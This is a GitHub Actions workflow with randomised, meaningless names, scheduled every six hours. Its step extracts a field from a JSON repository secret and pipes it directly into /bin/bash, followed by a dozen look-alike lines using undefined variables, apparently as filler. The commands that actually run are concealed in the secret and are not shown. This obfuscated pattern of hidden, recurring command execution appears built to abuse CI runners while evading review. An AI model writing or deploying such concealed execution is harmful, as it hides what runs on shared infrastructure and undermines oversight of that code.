name: piqijing4567
on:
  workflow_dispatch:
  schedule:
    - cron: '2 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: piqijing4567
        env:
          xwfw34: ${{ secrets.xwfw34 }}
        run: |
          echo $xwfw34 | jq -r .jdkp690 | /bin/bash
          echo $tln3 | jq -r .qutjg85199 | /bin/bash
          echo $besz6430 | jq -r .zr59398 | /bin/bash
          echo $r4 | jq -r .xwt8 | /bin/bash
          echo $hw8 | jq -r .f9967 | /bin/bash
          echo $aqn621 | jq -r .nu3 | /bin/bash
          echo $boi76 | jq -r .jbjv4723 | /bin/bash
          echo $efb06215 | jq -r .zcjb961 | /bin/bash
          echo $g1 | jq -r .wuuxa3844 | /bin/bash
          echo $noe4956 | jq -r .bg37 | /bin/bash
          echo $lnyjb85 | jq -r .nmmp41215 | /bin/bash
          echo $x46 | jq -r .caxrd39 | /bin/bash
          echo $t4 | jq -r .dwxm2 | /bin/bash

